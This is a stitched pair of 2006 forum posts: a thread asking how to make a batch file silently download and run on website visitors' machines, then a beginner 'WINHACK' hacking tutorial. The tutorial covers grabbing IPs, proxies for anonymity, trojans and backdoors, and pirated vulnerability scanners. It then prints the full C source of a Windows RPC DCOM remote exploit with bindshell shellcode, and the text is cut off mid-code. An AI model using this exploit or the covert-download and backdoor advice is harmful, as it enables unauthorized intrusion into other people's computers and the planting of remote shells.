lernerdude
Nov 5 2006, 12:46 AM
how do i put a batch file i made on my website so that it automaticaly downloads without them knowing? i no i no batch file r gay and nooby but ima noob and i cant do c/c++ programing. so how do i make it so that it automaticlay downloads and opens?
any help is apreciated plz & TY!
sekio
Nov 5 2006, 12:53 AM
aside from browser exploits you cant
Nitrogen
Nov 5 2006, 02:25 AM
<img src="http://mywebsite.com/files/gaybatch.bat">
Of course it's an image tag, that should still download the .bat to see if it's an image..however it'll be useless once downloaded into the cache because the user wont know about it and will never be executed.
Nitrogen.
---------------------------
Aug 19 2006, 01:43 AM
Nublet’s hand manual….to WINHACK – v. 1
From a newbie.. to a newbie biggrin.gif
By DaBuKe
[This is my first tutorial EVER.. so don't bash me even if it's awful... hope this contributes though]
This Text is only for educational purposes only and I am not responsible for YOUR actions.
Personal Comments: Well… basically, I thought I’d make a tutorial about hacking, cracking, types of web hacking and things so that new people would stop SPAMMING rohitab and refer to this to learn. This doesn’t have much advanced stuff (because I don’t know much advanced things) so this thing will cover the basics and fundamentals of hacking. (Usually hacking a windows computer. Especially XP) Please, you can distribute this tutorial anywhere, but give due credit to me. biggrin.gif If you would like to add/update something, or correct a misconception here, please e-mail me at da_park91@hotmail.com. (NO SPAM PL0X)
Or just PM at Rohitab.com/discuss
1. The Basics
1.1 What is an IP?
1.2 How to obtain an IP – via domain, messengers
1.3 Proxies
1.4 Ports – what are they?
1.5 Backdoors – the script kiddie way (>:3)
2. The Art of Hacking
2.1 Introduction
2.2 Information Gathering
2.3 Finding a Vulnerability (by portscanning, Vuln. Scanning, Banner Grabbing)
2.4 Using the vuln. To gain access( EXPLOITS :DDDD)
2.5 Planting a Backdoor/RAT for later use
2.6 Automated Penetration Testing
3. Credits/ Site Reference
HERE IT GOES!!11!1! BAM
1. The basics
1.1 What is an IP?
IP, in other words Internet Protocol, is a set of unique numbers that signifies the address of a computer or a server connected to a network. Every network-relating device must have an IP address – i.e. 104.23.60.3. Internet Protocol Address is made up of four numbers in the range of 0 to 255.
Basically, and IP address is like the address to your house. You need this IP so that the internet or the network knows where to send the data to.
There are two types of IPs (for basic ones). Static and Dynamic. Static IPs are literally static: they don’t change. The Static IP assigned to a computer will FOREVA stay the same way unless of course YOU change it.(or the owner) Dynamic IPs are one that are assigned each time you connect to the internet. The ip address is not consistent and it will always change.
1.2 How to obtain the IP address – via messenger, domain
If you have an internet address (URL) of a site, and you want to find out their ip, you can simply ping them. Open up a command line, type “ping thewebsite.org”, and below, it informs you with the ip it’s pinging.
For grabbing the ip of a messenger user, there are different ways.
For msn messenger, just netstat –na wont help you, because that will only show the server not the person’s computer. DO netstat WHILE transferring files. This will show the ip of the person you’re sending the file to. (of course, port 1863)
For AIM, I believe just a netstat anytime is sufficient. =D
1.3 Proxies
Anonymity is an important part of a hacker’s job, because often, even white hat hacking, can include very illegal things. Proxy is a way of keeping anonymity. Proxy is a server out there that you can connect to to connect to the internet anonymously.(riddles D:) Setting up a proxy is very simple(for IE, Firefox and stuff). Just go to Tools, options, general, manual proxy settings for firefox. For IE, go to tools, internet options, connections, lan settings.
What to put in the box? Go to this website, choose an ip (anonymous provider one), fill the box.
http://www.samair.ru/proxy/
http://www.publicproxyservers.com/
1.4 TCP ports
what is a port? Basically, it is a door or a window to a computer through which applications and software make connections and send/receive data/info. For an example, the internet explorer uses port “80” to transmit an accept packets in which the data is stored in. Each port has a different , specific use.
For a list of description of each port, check this site:
http://www.iana.org/assignments/port-numbers
1.5 Trojans
Trojans. The twenty first century’s Skiddie-tool. Trojans are available to everyone now, and if you are trying to learn how to hack, you have used a Trojan at some point. It is somewhat easy to use, but it is a weak way of hacking. What people do with it nowadays is just send the infected file to a person and just tell them to open it. That’s it. No exploits, no vulnerabilities just plain, social engineering.
However, Trojans were not made in purpose of this. Trojans(Backdoors/RAT) were made so that when a person break’s into a computer, a server or a network, they could plant this “backdoor” so later on, they could easily get in again.
What Trojan does is they open a “back door” or a secret door for the hacker so that they can sneak in with out having to go through the trouble of hacking in.
There are two parts of Trojans : Server / Client
The server file is the infected file, which when executed, will open the back door and make the system vulnerable. Client file is the file that communicates with the server to control the infected file. Depending on how the server is programmed, the client can control the computer. The server might open up a shell for you, or give you admin privileges. The possibilities are infinite.
However powerful these program might be, if these programs are public ones : like sub7, netbus, schoolbus, optix pro: it will easily be detected by any AVs available (even the free ones D:) so what should we do? Program your own.
But still, here is a site that keeps many Trojans and tools : http://library.2ya.com
2. The Art of Hacking
2.1 Introduction
In this section of the tutorial, I will teach you the basics of hacking into a computer, in the purpose of WHITE HAT HACKING. White hat hacking is hacking into servers or computers to find and report the vulnerabilities of a server so that the administrator of the server can patch up the vulnerability. You should not cause ANY harm when white hat hacking. Get in, raise your access level to the highest, get out, and report to the owner of the server/computer or w/e. Tell them the vulnerabilities and exploits you used so that they can patch their server, and this will help this world become more secure biggrin.gif
2.2 Information Gathering is perhaps one of the most important steps of hacking.
It is gathering information on the server/computer you are targeting : pinging, port scanning, banner grabbing, etc.
Pinging : This is the most basic form of checking if the host you are about to attack is alive. Simply, go to the command prompt, and type “ping thetarget.org” or the ip, “ping 127.0.0.1” (by the way, 127.0.0.1 is a loop IP, and it is always your OWN IP) Of course, without the quotes. If it returns ANY of the packets sent, then IT IS ALIVE. Even if you send like 100 and it returns 1, that still means it’s alive(or was alive tongue.gif)
Port Scanning : Port scanning is scanning a computer to check if any ports are open. Port scanners usually return with the information of if the host is alive, what ports are open and what ports are closed/not responding. And also, many port scanners banner grab the open ports for you. Banner grabbing is a technique used to grab the software information that is running on the port. For an example, let’s say we scanned a box and we found out that it had port 135, 139, 445 open. We can guess from this info that it is running windows with RPC.
Good port scanners are : NMAP, Blues Port Scanner, SuperScanner. Find moreon google biggrin.gif
Vulnerability Scanner : There are scanners out there with the options portscanning and vulnerability scanning. Vulnerability scanning will scan the computer’s softwares and ports for any weak signs and vulnerabilities and creates a list of them for you. Using this list, you can find the correct exploits to compromise the server/computer. Most of these Vuln. Scanners are very expensive.. ranging from 200 dollars (US) to 12000 dollars. (Thus no script kiddie or a nub can have them) but.. *cough* warez *cough*. If you are GOOD enough and know how/where to search for those programs… You will be able to get your hands on them.
If you can get one.. :Shadow Security Scanner, XSpider
These steps are necessary to gather enough information to find weak points and vulnerabilities. It’s like getting the blueprint of the bank you want to rob. What idiot would try to rob a bank without any info about it?
2.3 Finding the vulnerability/exploit
If you did get your hands on a nice vuln. Scanner, this will be much easier for
you. However, before looking for any exploits, you should try to understand what the hole is in the system, and how the exploit tries to compromise the system. (Thus learning from the programs and things you use) Exploits, nowadays, are very easy to get since the internet is like a sea of information. There are thousands of website with millions of exploits. Now, the only thing you have to do to find an exploit for a specific target is just type in the software you want the exploit for in google, and VOILA. You get hundreds of web pages.
Here is a list of websites with very, VERY useful information on computers, vulnerabilities and exploits.
http://www.metasploit.com/
http://www.milw0rm.com/
http://www.securiteam.com/exploits/
http://www.iss.net/security_center/advice/...its/default.htm
http://zone-h.com/
http://www.antiserver.it/
http://www.frsirt.com/exploits/
http://packetstormsecurity.org/
http://exploits-lab.info/index.php
http://archives.neohapsis.com/archives/fulldisclosure/
http://d3fonix.uni.cc/
http://www.cert.org/nav/index_red.html
http://www.governmentsecurity.org/exploits.php
http://www.hoobie.net/security/exploits/
http://www.hackemate.com.ar/exploits/
http://www.insecure.org/sploits.html
HTTP://WWW.GOOGLE.COM
However, I’m pretty sure NONE of these sites will produce you with 0day, non-published, private exploits.(since if you put it up on these websites, it will be public tongue.gif)
So most likely, the only way of hacking into a system with fully updated, patched softwares and vulnerabilities, is you on your own finding out a new exploit.(which can be quite hard sometimes) To find out an exploit, you need to learn how to program, and learn how things work with computers. For questions regarding this, visit
http://www.rohitab.com/discuss
This site is VERY useful for programming, virii-creating, computer-regarding questions. Very VERY VERY ZOMG VERY intelligent, helpful people there. [emphasize on very and intelligent]
2.4 Exploits, using vulnerability
Now, what do we do with the exploit codes found on these websites? To some of you, these codes might look like gibberish (some of them look gibberish to me too D: cause I’m also a nub at programming perl, php and stuff). These codes are you weapons(I should say) because these are the codes that use the vulnerabilities to gain access to a system. You still don’t know what to do with these codes?
Well, it is different for each programming language. For example, C/C++ exploit codes, you have to compile. For perl, php, you have to get a processor of this languages. Well, how do you find out what language it’s in? I’m not gonna tell you. Do some research. Study programming languages(at least a bit so that you can find out what language its in.. if you can’t figure that out, throw your computer away RIGHT NOW) So compile/process the code to use it.
What exactly are exploits? “In computer security, an exploit is a piece of software, a chunk of data, or sequence of commands that take advantage of a bug, glitch or vulnerability in order to gain control of a computer system or allow privilege escalation or a denial of service attack.” Quoted from wikipedia. You have to learn how to classify an exploit. Is it local? Remote? Privilege escalation? Access? Buffer overflow? Denial of Service? I’m too lazy to do all the research and explanation for you. Look up information on exploits on the web, read, read, read. Read. And read, read. AND THEN READ MORE. That’s the only way. READ, not babble.
Here is an example code of an exploit(RPC DCOM exploit for windows XP, 2000):
CODE
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP. This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation. It also has several other options including definable
* bindshell and attack ports.
*
* Features:
*
* -d destination host to attack.
*
* -p for port selection as exploit works on ports other than 135(139,445,539 etc)
*
* -r for using a custom return address.
*
* -t to select target type (Offset) , this includes universal offsets for -
* win2k and winXP (Regardless of service pack)
*
* -l to select bindshell port on remote machine (Default: 666)
*
* - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus
* preventing crash of RPC service on remote machine.
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
/* xfocus start */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
x00,
0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */
int type=0;
struct
{
char *os;
u_long ret;
}
targets[] =
{
{ "[Win2k-Universal]", 0x0018759F },
{ "[WinXP-Universal]", 0x0100139d },
}, v;
void usage(char *prog)
{
int i;
printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
printf("Usage:\n\n");
printf("%s -d <host> [options]\n", prog);
printf("Options:\n");
printf(" -d: Hostname to attack [Required]\n");
printf(" -t: Type [Default: 0]\n");
printf(" -r: Return address [Default: Selected from target]\n");
printf(" -p: Attack port [Default: 135]\n");
printf(" -l: Bindshell port [Default: 666]\n\n");
printf("Types:\n");
for(i = 0; i < sizeof(targets)/sizeof(v); i++)
printf(" %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
exit(0);
}
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff" /* return address */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
/* bindshell no RPC crash, defineable spawn port */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
/* xfocus start */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */
/* Not ripped from teso =) */
void con(int sockfd)
{
char rb[1500];
fd_set fdreadme;
int i;
FD_ZERO(&fdreadme);
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
while(1)
{
FD_SET(sockfd, &fdreadme);
FD_SET(0, &fdreadme);
if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
if(FD_ISSET(sockfd, &fdreadme))
{
if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if(write(1, rb, i) < 0) break;
}
if(FD_ISSET(0, &fdreadme))
{
if((i = read(0, rb, sizeof(rb))) < 0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (send(sockfd, rb, i, 0) < 0) break;
}
usleep(10000);
}
printf("[-] Connection closed by foreign host..\n");
exit(0);
}
int main(int argc, char **argv)
{
int len, len1, sockfd, c, a;
unsigned long ret;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
struct hostent *he;
struct sockaddr_in their_addr;
static char *hostname=NULL;
if(argc<2)
{
usage(argv[0]);
}
while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
{
switch (c)
{
case 'd':
hostname = optarg;
break;
case 't':
type = atoi(optarg);
if((type > 1) || (type < 0))
{
printf("[-] Select a valid target:\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os);
return 1;
}
break;
case 'r':
targets[type].ret = strtoul(optarg, NULL, 16);
break;
case 'p':
port = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
case 'l':
lportl = atoi(optarg);
if((port > 65535) || (port < 1))
{
printf("[-] Select a port between 1-65535\n");
return 1;
}
break;
default:
usage(argv[0]);
return 1;
}
}
if(hostname==NULL)
{
printf("[-] Please enter a hostname with -d\n");
exit(1);
}
printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
printf("[+] Resolving host..\n");
if((he = gethostbyname(hostname)) == NULL)
{
printf("[-] gethostbyname: Couldnt resolve hostname\n");
exit(1);
}
printf("[+] Done.\n");
printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
targets[type].os, hostname, port, lportl, targets[type].ret);
/* drg */
lportl=htons(lportl);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&sc[471],&lport,4);
memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(port);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("[-] Socket failed");
return(0);
}
if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("[-] Connect failed");
return(0);
}
/* xfocus start */
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
/* end xfocus */
if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
{
perror("[-] Send failed");
return(0);
}
len=recv(sockfd, buf1, 1000, 0);
if (send(sockfd,buf2,len1,0)== -1)
{
perror("[-] Send failed");
return(0);
}
close(sockfd);
sleep(1);
their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = lportl;
